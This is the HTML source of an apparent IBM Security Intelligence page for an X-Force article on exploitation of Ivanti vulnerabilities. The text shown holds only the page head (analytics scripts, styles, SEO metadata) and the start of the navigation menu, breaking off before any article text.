Widespread exploitation of recently disclosed Ivanti vulnerabilities

<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1">  <title>Widespread exploitation of recently disclosed Ivanti vulnerabilities</title>   <meta name="theme-color" content="#000000">  <meta name="referrer" content="no-referrer-when-downgrade"> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script>   <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)">    <script> // Digital Registry digitalData = { "page": { "category": { "primaryCategory": "Threat Intelligence" }, "pageInfo": { "language": "en-US", "country": "US", "version": "custom", "effectiveDate": "2024-02-23", "publishDate": "2024-02-23", "optimizely": { "enabled": "false", }, "ibm": { "contentDelivery": "WordPress", "contentProducer": "Hand coded", "owner": "", "siteID": "SECURITYINTELLIGENCE", "type": "Xforce", } } } } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } // }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script>  <script defer src="https://1.www.s81c.com/common/stats/ida_stats.js" type="text/javascript"></script>  <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630">  <meta name='robots' content='max-image-preview:large' /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.6.2" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/xforce/447108" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.2" /> <link rel='shortlink' href='https://securityintelligence.com/?p=447108' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fexploitation-of-exposed-ivanti-vulnerabilities%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fexploitation-of-exposed-ivanti-vulnerabilities%2F&format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans:200,300,400,500,600');@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500,600,700');@import url('https://fonts.googleapis.com/css2?family=IBM+Plex+Serif&display=swap')</style><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1722279696">   <meta name="description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Widespread exploitation of recently disclosed Ivanti vulnerabilities" /> <meta property="og:description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions." /> <meta property="og:url" content="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Application Security" /> <meta property="article:tag" content="Data Protection" /> <meta property="article:tag" content="Data Security" /> <meta property="article:tag" content="Incident Response (IR)" /> <meta property="article:tag" content="Known Vulnerabilities" /> <meta property="article:tag" content="security intelligence & analytics" /> <meta property="article:tag" content="threat hunting" /> <meta property="article:section" content="Threat Intelligence" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions." /> <meta name="twitter:title" content="Widespread exploitation of recently disclosed Ivanti vulnerabilities" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg","width":1200,"height":630,"caption":"Closeup on a blue circuit board with an orange padlock in the center"},{"@type":"WebPage","@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#webpage","url":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/","name":"Widespread exploitation of recently disclosed Ivanti vulnerabilities","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#primaryimage"},"datePublished":"2024-02-23T18:27:00+00:00","dateModified":"2024-03-06T18:52:47+00:00","description":"Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions."}]}</script>  </head> <body class="si_body" > <nav id="navigation" class="navigation navigation--homepage " aria-label="Security Intelligence"> <div class="container"> <div class="row">  <div class="navigation__brand"> <a href="https://securityintelligence.com" title="Security Intelligence" tabindex="1"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence Logo"> <div fallback> <h6>Security Intelligence</h6> </div> </amp-img> </a> </div>  <div class="navigation__menu" onmouseleave="delete localStorage['megamenu-status']"> <a tabindex="2" id="nav-news" href="/news/" class="navigation__button " data-menu="megamenu__news" onclick="localStorage['megamenu-status'] = 'first-interaction';">News</a> <a tabindex="4" id="nav-topics" href="/category/topics/" class="navigation__button " data-menu="megamenu__topics" onclick="localStorage['megamenu-status'] = 'first-interaction';">Topics</a> <a tabindex="5" id="nav-x-force" href="/x-force/" class="navigation__button " data-menu="megamenu__threat" onclick="localStorage['megamenu-status'] = 'first-interaction';">X-Force</a> <a tabindex="6" id="nav-media" href="/media/" class="navigation__button " data-menu="megamenu__podcast" onclick="localStorage['megamenu-status'] = 'first-interaction';">Podcast</a> <button aria-label="search Button" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="-1" type="button"> <amp-img tabindex="7" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Click to open the search bar"></amp-img> </button> </div>  <div id="search-tablet" class="navigation__menu navigation__menu--tablet" tabindex="-1"> <button type="button" class="navigation__button " data-menu="megamenu__news">News</button> <button type="button" class="navigation__button " data-menu="megamenu__topics" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.show, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Topics</button> <button type="button" class="navigation__button " data-menu="megamenu__threat" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.hide, megamenu__industries.hide, 